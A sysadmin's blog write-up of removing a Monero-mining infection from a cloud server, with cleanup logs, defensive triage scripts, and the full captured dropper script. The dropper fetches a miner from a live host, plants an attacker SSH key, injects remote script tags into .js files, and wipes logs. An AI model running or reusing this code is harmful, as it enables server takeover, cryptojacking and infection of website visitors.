Recently Alibaba Cloud started sending me alert SMS messages for my server: "Abnormal process behavior - suspicious host access behavior". Since it is only a server I play around with, I did not take it seriously at the time; I tried accessing the server and everything still looked normal. Later there was even an alert "Malicious process (cloud scan) - mining program". One day when I had some spare time I logged in to take a look, and the problem was serious: the server's entire crontab had been rewritten into garbage. Checking other things, they were still normal, but when I opened the website it had suddenly become very slow. Sure enough, it was infected: a Monero (XMR) mining program. The alert screenshot is shown below.

Article URL: http://www.04007.cn/article/562.html. Reproduction without permission is prohibited.
After logging in to the server, I first looked at which files in each directory had been modified in the last few days, and found a zigw that I had never seen before; it was certainly part of the virus. I went to delete it, but it turned out these files had been given special attributes, so I had to clear them before the removal would go through:

```
[root@04007 etc]# find ./ -mtime -4
./
./zigw           # virus program
./gmbpr2
./selinux/config
./ld.so.cache
./shz.sh         # virus script
[root@04007 etc]# sudo rm -f zigw
rm: cannot remove `zigw': Operation not permitted
[root@04007 etc]# lsattr zigw
----i--------e- zigw
[root@04007 etc]# sudo chattr -i zigw
[root@04007 etc]# lsattr zigw
-------------e- zigw
[root@04007 etc]# sudo rm -f zigw
[root@04007 etc]#
```

I then restored the crontab and the rest. In the Alibaba Cloud console the alert also gave the malicious file path, /etc/zigw, and the malicious file's md5, 016c00d3fa0cc49b76597916aa8f14dd. The virus keeps downloading this sh file from a remote host, http://c.21-2n.com:43768/shz.sh, and then does its dirty work on the server (mining, presumably); this is the "suspicious host access behavior" that Alibaba Cloud alerted on, as shown in the alert screenshot.
During the check, besides the modifications above, I searched everywhere else as well and found that the virus had also written an entry into /root/.ssh/authorized_keys, recorded here:

```
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFNFCF6tOvSqqN9Zxc/ZkBe2ijEAMhqLEzPe4vprfiPAyGO8CF8tn9dcPQXh9iv5/vYEbaDxEvixkTVSJpWnY/5ckeyYsXU9zEeVbbWkdRcuAs8bdVU7PxVq11HLMxiqSR3MKIj7yEYjclLHRUzgX0mF2/xpZEn4GGL+Kn+7GgxvsRtqHLMWoh2Xoz7f8Rb3KduYiJlZeX02a4qFXHMSkSkMnHirHHtavIFjAB0y952+1DzD36a8IJJcjAGutYjnrZdKP8t3hiEw0UBADhiu3+KU641Kw9BfR9Kg7vZgrVRf7lVzOn6O8YbqgunZImJt+uLljgpP0ZHd1wGz+QSHEd Administrator@Guess_me
```
At this point the basic file changes had been reverted, but the server still felt slow. I found a very CPU-heavy process, zigw, and killed it:

```
# ps -ef | grep zigw
root     13944     1  0 Nov06 ?        00:15:45 ./zigw
# sudo kill -stop 13944
```

Having got this far I did nothing more beyond restoring the cron file, and the server was quiet for two days. Then the same alert appeared again. Logging back in, the server load was normal and the only file change was that the crontab had been rewritten again. Looking at the account list I found some users I had no memory of and that did not look like ones I had added, so I deleted them all, because by then Alibaba Cloud had also raised an alert: "Linux system login weak-password detection (high risk): weak password detection - SSH weak password detection". So the main problem was evidently that the root password was too simple. I therefore also changed the passwords of the users that must remain, jenkins and root; the old passwords were fairly simple, and this time I made them very complex. Finally I added a special attribute to the cron files.

```
exim:x:93:93::/var/spool/exim:/sbin/nologin
rsyncuser:x:505:506::/home/rsyncuser:/bin/bash
named:x:25:25:Named:/var/named:/sbin/nologin
# 1. delete the extra users
[root@04007 ~]# userdel exim
[root@04007 ~]# userdel rsyncuser
[root@04007 ~]# userdel named
# 2. change the passwords of the required users and make them more complex
[root@04007 ~]# passwd jenkins
Changing password for user jenkins.
# finally add the attribute to the cron files
$ sudo chattr +i /etc/crontab
$ sudo chattr +i /var/spool/cron/root
[root@04007 cron.d]# chattr +i /var/spool/cron/root
[root@04007 cron.d]# sudo lsattr /var/spool/cron/root
----i--------e- /var/spool/cron/root
```

I also added the following job in /etc/cron.d/sysstat and in the crontab so that zigw gets killed whenever it shows up. The precondition is that /var/spool/cron/root has the special i attribute set.

```
*/1 * * * * ps -ef|grep zigw|grep -v grep|awk '{print $2}'|xargs kill -9 && date >> /tmp/killzigw.log
```
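As an added example (not the post's own commands), the following POSIX sh script packages the checks from this write-up into reusable functions and runs them against a constructed fixture: a crontab with the dropper entry, an authorized_keys file with one trusted and one planted key, a saved `ps -ef` listing, and a freshly written file tree. The indicator strings (c.21-2n.com, shz.sh, zigw, and the xvsRtqHLMWoh substring that shz.sh itself greps for in authorized_keys) come from the post; the key blobs, the known_keys allowlist, the ps listing and the directory layout are constructed. The exact-name PID lookup is included because the cron one-liner above uses `grep zigw`, which also matches any other process whose command line contains that string; `pgrep -x zigw` gives the same exact-name semantics on a live host.

```shell
#!/bin/sh
# Added example, not code from the original post: offline triage helpers for the
# indicators described above (crontab entries pulling shz.sh, the planted SSH
# key, the zigw process, recently changed files). Every input is a constructed
# fixture created under a temp directory, so nothing on the real host is touched.

IOC_HOST='c.21-2n.com'        # download host from the Alibaba Cloud alert and shz.sh
IOC_SCRIPT='shz.sh'           # name of the dropper script
IOC_KEY_MARK='xvsRtqHLMWoh'   # substring shz.sh itself uses to recognise its key
IOC_PROC='zigw'               # miner binary name

# ---- constructed fixture -----------------------------------------------------
FIX=$(mktemp -d)
trap 'rm -rf "$FIX"' EXIT
mkdir -p "$FIX/etc" "$FIX/root/.ssh"
printf '%s\n' 'SHELL=/bin/bash' \
  '0 2 * * * root /usr/local/bin/backup.sh' \
  '*/12 * * * * curl -fsSL http://c.21-2n.com:43768/shz.sh | sh' > "$FIX/etc/crontab"
printf 'not a real binary\n' > "$FIX/etc/zigw"
# one legitimate key plus the planted one; both key blobs are constructed placeholders
printf '%s\n' 'ssh-ed25519 AAAAC3CONSTRUCTEDADMINKEY admin@laptop' \
  'ssh-rsa AAAAB3CONSTRUCTEDxvsRtqHLMWohPLANTEDKEY Administrator@Guess_me' \
  > "$FIX/root/.ssh/authorized_keys"
printf '%s\n' 'AAAAC3CONSTRUCTEDADMINKEY' > "$FIX/known_keys"   # allowlist of trusted key blobs
printf '%s\n' 'UID        PID  PPID  C STIME TTY          TIME CMD' \
  'root         1     0  0 Nov06 ?        00:00:01 /sbin/init' \
  'root     13944     1  0 Nov06 ?        00:15:45 ./zigw' \
  'root     14020     1  0 Nov06 ?        00:00:00 /usr/sbin/zigwatch' > "$FIX/ps.txt"

# ---- checks ------------------------------------------------------------------

# Files under a directory modified within the last N days (the post's find -mtime -4).
recent_files() {   # $1 = directory, $2 = days
    find "$1" -xdev -type f -mtime "-$2"
}

# Crontab lines that fetch from the dropper host or reference the dropper script.
find_cron_iocs() {   # $1 = crontab file
    grep -E "$IOC_HOST|$IOC_SCRIPT" "$1" || true
}
count_cron_iocs() {   # $1 = crontab file; prints 0 when clean
    grep -c -E "$IOC_HOST|$IOC_SCRIPT" "$1" || true
}

# Comments of authorized_keys entries whose key blob is not in the allowlist.
unknown_keys() {   # $1 = authorized_keys, $2 = file with one trusted key blob per line
    awk -v allow="$2" '
        BEGIN { while ((getline l < allow) > 0) ok[l] = 1 }
        NF >= 2 && $1 !~ /^#/ && !($2 in ok) { print ($3 != "" ? $3 : "(no comment)") }
    ' "$1"
}

# Exit 0 when the substring shz.sh tests for is present, i.e. its key was planted.
key_marker_present() {   # $1 = authorized_keys
    grep -q "$IOC_KEY_MARK" "$1"
}

# PIDs whose command name matches exactly, from a saved `ps -ef` listing.
pids_named() {   # $1 = ps -ef listing, $2 = command name
    awk -v n="$2" '$1 != "UID" { cmd = $8; sub(/^.*\//, "", cmd); if (cmd == n) print $2 }' "$1"
}

# What the cron one-liner's `grep zigw` would match: every line containing the string.
naive_grep_matches() {   # $1 = ps -ef listing, $2 = string
    grep -c "$2" "$1" || true
}

# Paths with the immutable (i) attribute set; needs lsattr and an ext/xfs filesystem.
immutable_files() {   # $1 = directory
    command -v lsattr >/dev/null 2>&1 || return 0
    lsattr -R "$1" 2>/dev/null | awk 'length($1) >= 10 && $1 ~ /^[-A-Za-z]*$/ && index($1, "i") { print $2 }'
}

# ---- demo run on the fixture -------------------------------------------------
echo "files changed in the last 4 days:";  recent_files "$FIX/etc" 4
echo "crontab lines pulling the dropper:"; find_cron_iocs "$FIX/etc/crontab"
echo "SSH keys not in the allowlist:";     unknown_keys "$FIX/root/.ssh/authorized_keys" "$FIX/known_keys"
echo "PIDs named $IOC_PROC:";              pids_named "$FIX/ps.txt" "$IOC_PROC"
echo "lines a plain grep would match: $(naive_grep_matches "$FIX/ps.txt" "$IOC_PROC")"
echo "immutable files in the fixture:";    immutable_files "$FIX"
```

One caveat on the `chattr +i` step: it stops this particular dropper only because shz.sh runs `chattr -i $cont`, where `$cont` holds the crontab's contents rather than its path, so the immutable flag on the real file is never cleared and the `echo ... >> ${crondir}` append fails. A dropper running as root that targets the file path would simply remove the flag first, so treat `+i` as a speed bump rather than a boundary; the password change and the removal of unknown accounts and keys are what actually close the door.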
Another risk is that my SELinux is disabled; I turned it off some time ago for some server work. I have not changed this back yet, which may carry a bit of risk, but it stays that way for now. For details on the Monero (XMR) mining program see: https://4hou.win/wordpress/?spm=a2c4e.11153940.blogcont657476.14.53ff2757BWMBre&cat=6270

The shz.sh virus script is as follows:
```sh
#!/bin/sh
# Reproduced as found; the typos (dev/null, desabled, zjgw, 43768:43768, runing) are the dropper's own.
# Stage 1: disable SELinux and drop caches.
setenforce 0 2>dev/null
echo SELINUX=desabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
# Read the current crontab and authorized_keys into variables; they are used as strings below.
crondir='/var/spool/cron/'"$USER"
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
# Marker file /etc/gmbpr2 selects the /etc branch; an older marker /etc/gmbpr triggers cleanup of a previous version.
echo 1 > /etc/gmbpr2
rtdir="/etc/gmbpr2"
oddir="/etc/gmbpr"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/url"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/get"
# Rename wget/curl; the dropper keeps using the renamed copies (url, get).
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/curl /usr/bin/url
if [ -f "$oddir" ]
then
    pkill zjgw
    chattr -i /etc/shz.sh
    rm -f /etc/shz.sh
    chattr -i /tmp/shz.sh
    rm -f /tmp/shz.sh
    chattr -i /etc/gmbpr
    rm -f /etc/gmbpr
else
    echo "ok"
fi
if [ -f "$rtdir" ]
then
    echo "goto 1" >> /etc/gmbpr2
    # Persistence: re-fetch the dropper from cron every 12 or 15 minutes.
    chattr -i $cont
    if [ -f "$bbdir" ]
    then
        [[ $cont =~ "shz.sh" ]] || echo "*/12 * * * * curl -fsSL http://c.21-2n.com:43768/shz.sh | sh" >> ${crondir}
    else
        [[ $cont =~ "shz.sh" ]] || echo "*/15 * * * * url -fsSL http://c.21-2n.com:43768/shz.sh | sh" >> ${crondir}
    fi
    # Plant the attacker's SSH key unless the marker substring is already present.
    mkdir /root/.ssh
    [[ $ssht =~ "xvsRtqHLMWoh" ]] || chmod 700 /root/.ssh/
    [[ $ssht =~ "xvsRtqHLMWoh" ]] || echo >> /root/.ssh/authorized_keys
    [[ $ssht =~ "xvsRtqHLMWoh" ]] || chmod 600 /root/.ssh/authorized_keys
    [[ $ssht =~ "xvsRtqHLMWoh" ]] || echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFNFCF6tOvSqqN9Zxc/ZkBe2ijEAMhqLEzPe4vprfiPAyGO8CF8tn9dcPQXh9iv5/vYEbaDxEvixkTVSJpWnY/5ckeyYsXU9zEeVbbWkdRcuAs8bdVU7PxVq11HLMxiqSR3MKIj7yEYjclLHRUzgX0mF2/xpZEn4GGL+Kn+7GgxvsRtqHLMWoh2Xoz7f8Rb3KduYiJlZeX02a4qFXHMSkSkMnHirHHtavIFjAB0y952+1DzD36a8IJJcjAGutYjnrZdKP8t3hiEw0UBADhiu3+KU641Kw9BfR9Kg7vZgrVRf7lVzOn6O8YbqgunZImJt+uLljgpP0ZHd1wGz+QSHEd Administrator@Guess_me" >> /root/.ssh/authorized_keys
    # (Re)download the miner if it is not running, missing, or not the expected size, then start it.
    ps -fe|grep zigw |grep -v grep
    if [ $? -ne 0 ]
    then
        cd /etc
        filesize=`ls -l zigw | awk '{ print $5 }'`
        file="/etc/zigw"
        if [ -f "$file" ]
        then
            if [ "$filesize" -ne "1467080" ]
            then
                chattr -i /etc/zigw
                rm -f zigw
                if [ -f "$bbdir" ]
                then
                    curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /etc/zigw
                elif [ -f "$bbdira" ]
                then
                    url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /etc/zigw
                elif [ -f "$ccdir" ]
                then
                    wget --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/zigw
                elif [ -f "$ccdira" ]
                then
                    get --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/zigw
                fi
            fi
        else
            if [ -f "$bbdir" ]
            then
                curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /etc/zigw
            elif [ -f "$bbdira" ]
            then
                url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /etc/zigw
            elif [ -f "$ccdir" ]
            then
                wget --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/zigw
            elif [ -f "$ccdira" ]
            then
                get --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/zigw
            fi
        fi
        chmod 777 zigw
        sleep 1s
        ./zigw
    else
        echo "runing....."
    fi
    # Lock the dropped files with the immutable attribute (why rm failed in the write-up above).
    chmod 777 /etc/zigw
    chattr +i /etc/zigw
    chmod 777 /etc/shz.sh
    chattr +i /etc/shz.sh
    shdir='/etc/shz.sh'
    if [ -f "$shdir" ]
    then
        echo "exists shell"
    else
        if [ -f "$bbdir" ]
        then
            curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/shz.sh > /etc/shz.sh
        elif [ -f "$bbdira" ]
        then
            url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/shz.sh > /etc/shz.sh
        elif [ -f "$ccdir" ]
        then
            wget --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/shz.sh
        elif [ -f "$ccdira" ]
        then
            get --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/shz.sh
        fi
        sh /etc/shz.sh
    fi
else
    # Same logic as above, staged under /tmp when /etc is not writable.
    echo "goto 1" > /tmp/gmbpr2
    chattr -i $cont
    if [ -f "$bbdir" ]
    then
        [[ $cont =~ "shz.sh" ]] || echo "*/10 * * * * curl -fsSL http://c.21-2n.com:43768:43768/shz.sh | sh" >> ${crondir}
    else
        [[ $cont =~ "shz.sh" ]] || echo "*/10 * * * * url -fsSL http://c.21-2n.com:43768:43768/shz.sh | sh" >> ${crondir}
    fi
    ps -fe|grep zigw |grep -v grep
    if [ $? -ne 0 ]
    then
        cd /tmp
        filesize=`ls -l zigw | awk '{ print $5 }'`
        file="/tmp/zigw"
        if [ -f "$file" ]
        then
            if [ "$filesize" -ne "1467080" ]
            then
                chattr -i /tmp/zigw
                rm -f zigw
                if [ -f "$bbdir" ]
                then
                    curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /tmp/zigw
                elif [ -f "$bbdira" ]
                then
                    url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /tmp/zigw
                elif [ -f "$ccdir" ]
                then
                    wget --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/zigw
                elif [ -f "$ccdira" ]
                then
                    get --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/zigw
                fi
            fi
        else
            if [ -f "$bbdir" ]
            then
                curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /tmp/zigw
            elif [ -f "$bbdira" ]
            then
                url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /tmp/zigw
            elif [ -f "$ccdir" ]
            then
                wget --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/zigw
            elif [ -f "$ccdira" ]
            then
                get --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/zigw
            fi
        fi
        chmod 777 zigw
        sleep 1s
        ./zigw
    else
        echo "runing....."
    fi
    chmod 777 /tmp/zigw
    chattr +i /tmp/zigw
    chmod 777 /tmp/shz.sh
    chattr +i /tmp/shz.sh
    shdir='/tmp/shz.sh'
    if [ -f "$shdir" ]
    then
        echo "exists shell"
    else
        if [ -f "$bbdir" ]
        then
            curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/shz.sh > /tmp/shz.sh
        elif [ -f "$bbdira" ]
        then
            url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/shz.sh > /tmp/shz.sh
        elif [ -f "$ccdir" ]
        then
            wget --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/shz.sh
        elif [ -f "$ccdira" ]
        then
            get --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/shz.sh
        fi
        sh /tmp/shz.sh
    fi
fi
# Flush the firewall, then block outbound connections to common mining-pool ports and kill
# anything using them or mentioning "stratum": this removes competing miners from the host.
iptables -F
iptables -X
iptables -A OUTPUT -p tcp --dport 3333 -j DROP
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
iptables -A OUTPUT -p tcp --dport 7777 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
iptables -A OUTPUT -p tcp --dport 14444 -j DROP
iptables-save
service iptables reload
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
netstat -ano|grep :3333|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :4444|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :5555|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :6666|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :7777|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :3347|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :14444|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
netstat -ano|grep :14443|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
# Append a remote <script> tag to every .js file on disk that does not already carry the f4ce9 marker.
find / -name '*.js'|xargs grep -L f4ce9|xargs sed -i '$a\document.write\('\'\<script\ src=\"http://t.cn/EvlonFh\"\>\</script\>\<script\>OMINEId\(\"e02cf4ce91284dab9bc3fc4cc2a65e28\",\"-1\"\)\</script\>\'\)\;
# Anti-forensics: clear shell history, root's mail, and the login logs.
history -c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history
echo > /var/spool/mail/root
```
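As a second added example (again not from the post), this sh script pulls network indicators out of a captured dropper statically: the URLs it fetches, the host to block or alert on, the cron schedule it installs, the outbound ports it firewalls and kills connections on, and the tools it renames. It runs on a constructed excerpt that mirrors a few of the shz.sh lines above rather than on the full script; the only real value in the excerpt is the page's own download host, and the excerpt is only parsed, never executed.

```shell
#!/bin/sh
# Added example, not from the original post: static extraction of network
# indicators from a captured dropper. DROPPER is a constructed excerpt that
# mirrors a few shz.sh lines above; it is never executed, only parsed.

DROPPER=$(mktemp)
trap 'rm -f "$DROPPER"' EXIT
cat > "$DROPPER" <<'EOF'
#!/bin/sh
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/curl /usr/bin/url
[[ $cont =~ "shz.sh" ]] || echo "*/12 * * * * curl -fsSL http://c.21-2n.com:43768/shz.sh | sh" >> ${crondir}
curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /etc/zigw
iptables -A OUTPUT -p tcp --dport 3333 -j DROP
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
netstat -ano|grep :3333|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9
EOF

# Every URL the script fetches (block or alert on these at the egress proxy or DNS).
extract_urls() {   # $1 = script path
    grep -oE 'https?://[^[:space:]"|>]+' "$1" | LC_ALL=C sort -u
}

# host:port part of those URLs, for a firewall or DNS sinkhole rule.
extract_hosts() {   # $1 = script path
    extract_urls "$1" | sed 's#^https\{0,1\}://\([^/]*\).*#\1#' | LC_ALL=C sort -u
}

# Cron schedules the script appends (quoted "*/N * * * * ..." strings).
extract_cron_entries() {   # $1 = script path
    grep -oE '"\*/[0-9]+ \* \* \* \* [^"]*"' "$1" | tr -d '"'
}

# Outbound TCP ports it firewalls off (shz.sh uses this against competing miners).
extract_blocked_ports() {   # $1 = script path
    sed -n 's/.*--dport \([0-9][0-9]*\) -j DROP.*/\1/p' "$1"
}

# Ports whose connections it kills via netstat|grep :PORT.
extract_killed_ports() {   # $1 = script path
    grep -oE 'grep :[0-9]+' "$1" | sed 's/grep ://' | LC_ALL=C sort -u
}

# Tools it renames (explains why curl and wget "disappear" on an infected host).
extract_renamed_tools() {   # $1 = script path
    grep -oE '^mv /usr/bin/[A-Za-z]+ /usr/bin/[A-Za-z]+' "$1"
}

echo "urls:";          extract_urls "$DROPPER"
echo "hosts:";         extract_hosts "$DROPPER"
echo "cron entries:";  extract_cron_entries "$DROPPER"
echo "blocked ports:"; extract_blocked_ports "$DROPPER"
echo "killed ports:";  extract_killed_ports "$DROPPER"
echo "renamed tools:"; extract_renamed_tools "$DROPPER"
```

Point these functions at the real captured script (with `/etc/shz.sh` as `$1`) to get the block list and the cron pattern to search for across other hosts; the renamed-tools output is also a quick way to explain a host where `curl` suddenly reports "command not found".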